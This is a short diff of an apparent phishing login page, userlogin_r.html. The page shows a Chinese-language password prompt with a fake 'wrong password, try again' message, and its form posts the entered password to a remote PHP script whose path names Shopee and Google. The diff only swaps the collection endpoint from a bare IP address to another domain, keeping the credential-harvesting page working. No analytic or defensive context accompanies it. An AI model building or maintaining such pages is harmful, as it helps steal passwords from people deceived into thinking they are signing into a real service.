--- a/userlogin_r.html
+++ b/userlogin_r.html
@@ -24,7 +24,7 @@ charset=UTF-8">
   </div>
   <div class="body">
     <div class="tooltip"><br>輸入您的密碼</div>
-      <form class="change-password-form" id="editpasswd" name="editpasswd" action="http://207.210.200.146/~goontone/shopee/google/3.php" method="post">
+      <form class="change-password-form" id="editpasswd" name="editpasswd" action="http://settings.acsite.org/user/shopee/google/3.php" method="post">
        <input class="email" type="password" name="pass">
       	<br><p><font size="2" color="#FF1022">密碼錯誤，請再試一次。</font></p>
 		
